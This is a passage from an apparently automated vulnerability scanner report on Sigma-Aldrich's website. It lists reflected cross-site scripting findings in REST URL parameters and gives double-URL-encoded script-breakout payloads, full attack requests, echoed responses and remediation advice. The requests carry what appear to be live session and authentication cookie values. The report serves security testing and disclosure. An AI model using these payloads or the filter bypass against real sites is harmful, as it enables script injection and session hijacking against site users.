Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:23 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content2626f";alert(1)//d734e82c357/sigma-aldrich/the-americas/united-states/ordering","E404") ;
   </script>
...[SNIP]...

1.238. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ef04%2522%253balert%25281%2529%252f%252f587426c5d28 was submitted in the REST URL parameter 2. This input was echoed as 5ef04";alert(1)//587426c5d28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich5ef04%2522%253balert%25281%2529%252f%252f587426c5d28/the-americas/united-states/ordering HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:25 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich5ef04";alert(1)//587426c5d28/the-americas/united-states/ordering","E404") ;
   </script>
...[SNIP]...

1.239. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a38e8%2522%253balert%25281%2529%252f%252f9b2e188f1a0 was submitted in the REST URL parameter 3. This input was echoed as a38e8";alert(1)//9b2e188f1a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americasa38e8%2522%253balert%25281%2529%252f%252f9b2e188f1a0/united-states/ordering HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americasa38e8";alert(1)//9b2e188f1a0/united-states/ordering","E404") ;
   </script>
...[SNIP]...

1.240. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4c7d%2522%253balert%25281%2529%252f%252f9aa475d6dd0 was submitted in the REST URL parameter 4. This input was echoed as b4c7d";alert(1)//9aa475d6dd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-statesb4c7d%2522%253balert%25281%2529%252f%252f9aa475d6dd0/ordering HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-statesb4c7d";alert(1)//9aa475d6dd0/ordering","E404") ;
   </script>
...[SNIP]...

1.241. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/ordering [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/ordering

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd7b0%2522%253balert%25281%2529%252f%252fe09e07d008 was submitted in the REST URL parameter 5. This input was echoed as bd7b0";alert(1)//e09e07d008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states/orderingbd7b0%2522%253balert%25281%2529%252f%252fe09e07d008 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:30 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states/orderingbd7b0";alert(1)//e09e07d008","E404") ;
   </script>
...[SNIP]...

1.242. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f3c9%2522%253balert%25281%2529%252f%252f171a6932c4f was submitted in the REST URL parameter 1. This input was echoed as 6f3c9";alert(1)//171a6932c4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content6f3c9%2522%253balert%25281%2529%252f%252f171a6932c4f/sigma-aldrich/the-americas/united-states/promotional-offers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
